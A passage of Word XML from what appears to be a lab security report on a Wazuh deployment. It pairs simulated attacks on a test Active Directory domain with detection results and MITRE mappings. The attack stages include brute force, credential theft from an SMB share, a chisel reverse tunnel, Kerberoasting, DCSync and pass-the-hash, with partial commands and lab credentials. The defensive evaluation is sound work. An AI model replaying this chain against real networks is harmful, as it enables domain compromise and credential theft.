        <w:t xml:space="preserve">On execution, netsh.exe on the agent runs 'netsh advfirewall firewall add rule' creating an inbound block rule named 'WAZUH ACTIVE RESPONSE BLOCKED IP' with the attacker's srcip as RemoteIP. Successful firewall rule creation triggers Wazuh's built-in rule 92043 ('Netsh used to add firewall rule'), providing a confirmation alert that containment succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.6 Custom Authentication Monitoring Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A custom Wazuh dashboard 'Authentication Monitoring - DC1' was built using three visualizations to give SOC analysts operational visibility into authentication activity on the Domain Controller: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00"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Visualization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DC1 - Logon Failures Over Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Vertical Bar Chart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Time-series of authentication failures - reveals brute force bursts vs baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DC1 - Alert Level Distribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Pie Chart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Distribution of alert severity levels - highlights presence of Level 9-15 alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DC1 - Top Alerts Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Data Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Top rule.description values by count - identifies most common alert types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Detection Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three structured detection use cases were designed and executed. Each use case pairs a red-team action with the corresponding blue-team detection (or an explicit finding of no detection). All attack traffic originated from Kali Linux (10.10.10.60) using industry-standard tools.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Use Case 1 - Brute Force Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kerberos-based brute force attack against the Administrator account on DC1 using kerbrute (a Golang Kerberos brute force tool that speaks AS-REQ directly to the KDC). A password wordlist of 10-15 realistic weak passwords (Password1, Winter2024, Backup2024!, etc.) was iterated against the Administrator@fh.local principal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection chain successfully triggered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 60104 (Level 5) - Windows audit failure event (per attempt, Kerberos AS-REQ failure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 60205 (Level 10) - Multiple Windows audit failure events - correlation rule, primary detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 60115 (Level 9) - User account locked out (safe mode triggered after lockout threshold)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Active Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Active Response fired as designed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 657 - Active response executed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">netsh.exe on DC1 created firewall rule 'WAZUH ACTIVE RESPONSE BLOCKED IP' with RemoteIP=10.10.10.60</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 92043 (Level 10) - Netsh used to add firewall rule (confirmation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kerbrute aborted with 'USER LOCKED OUT and safe mode on! Aborting...'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1110.003 - Brute Force: Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1110.001 - Brute Force: Password Guessing</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Use Case 2 - Lateral Movement via Credential Leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A realistic multi-stage lateral movement chain simulating an attacker who has landed on the internal network with no credentials:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 1: Network discovery via nmap -sn on 10.10.10.0/24 (discovered pfSense-HQ and HQ-STAFF-01)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 2: Port scan of HQ-STAFF-01 identified open SMB (445), RDP (3389), NetBIOS (139)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 3: SMB share enumeration attempted with anonymous session (initially denied - proper security posture)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 4: Share name guessing loop using common names (Public, Shared, PublicShare, IT, HR, Finance, etc.) discovered 'PublicShare' as accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 5: Anonymous smbclient session to \\HQ-STAFF-01\PublicShare, downloaded it_notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 6: Extracted plaintext credentials from file (hqSaacid:passwordS$)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 7: Authenticated to HQ-STAFF-01 via SMB with stolen credentials (netexec returned [+])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 8: netexec winrm returned [+] (Pwn3d!) confirming hqSaacid in Remote Management Users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 9: Interactive PowerShell shell established via evil-winrm as fh\hqSaacid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 10: Post-exploitation reconnaissance inside HQ-STAFF-01 revealed DC1 (10.10.20.10) as DNS server, exposing the servers subnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection was partial and delayed to post-authentication:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 60106 (Level 3) - Windows Logon Success on HQ-STAFF-01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 92657 (Level 6) - Successful Remote Logon Detected, NTLM authentication, possible pass-the-hash attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explicitly not detected (see Section 8):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anonymous SMB null session establishment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Share name guessing pattern (12+ share access attempts from same source in &lt;60s)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File download from PublicShare (SACL auditing not configured on the share)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1046 - Network Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1135 - Network Share Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1552.001 - Unsecured Credentials: Credentials In Files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1078.002 - Valid Accounts: Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1021.006 - Remote Services: Windows Remote Management</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Use Case 3 - Privilege Escalation to Domain Admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuing from the compromised hqSaacid session on HQ-STAFF-01, the attacker performed the full privilege escalation chain to Domain Administrator:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Established chisel reverse SOCKS proxy: Kali chisel server on port 8000, HQ-STAFF-01 uploaded chisel.exe via certutil (LOLBin technique) and connected back with 'chisel client 10.10.10.60:8000 R:socks'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configured proxychains on Kali to route through the tunnel, giving Kali indirect access to DC1 that bypasses pfSense segmentation (HQ-STAFF-01 is an allowed source for HQ-SERVERS traffic)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerated valid usernames via kerbrute userenum (identified administrator, hqSaacid, svc_backup, itAdmin)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kerberoasted svc_backup via 'proxychains impacket-GetUserSPNs -request' - obtained TGS hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cracked svc_backup hash offline via 'hashcat -m 13100' with rockyou wordlist + best64.rule mutations - recovered password 'Summer2024!' in seconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authenticated as svc_backup to DC1 (proxychains netexec smb 10.10.20.10 -u svc_backup -p 'Summer2024!' returned [+])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executed DCSync attack via 'proxychains impacket-secretsdump' - extracted entire NTDS.dit contents including Administrator NT hash and krbtgt hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authenticated as Administrator via pass-the-hash: 'proxychains evil-winrm -H bf45b2acdc88eb...' - obtained interactive PowerShell shell as fh\administrator on DC1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Complete domain compromise achieved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Only partial detection - the primary attack techniques were not detected by Wazuh's default ruleset:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 92657 (Level 6) - fired during NTLM authentication phases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 60106 (Level 3) - Windows Logon Success (final Administrator logon)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explicitly not detected:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kerberoasting fingerprint (multiple 4769 TGS requests from single source for SPN accounts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DCSync attack (Event ID 4662 with DRSUAPI replication GUID)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chisel reverse SOCKS proxy (outbound tunnel from HQ-STAFF-01)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">certutil.exe used as file downloader (LOLBin technique)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pass-the-hash authentication (indistinguishable from legitimate NTLM auth in default logs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bonus Detection - Group Membership Change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A separate demonstration added hqSaacid to Domain Admins group. Wazuh's built-in detection for Event ID 4728 fired immediately with rule description 'Domain Admins Group Changed'. This confirms baseline privilege escalation detection works for administrative group modifications, but does not cover the more sophisticated Kerberoast+DCSync path used above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
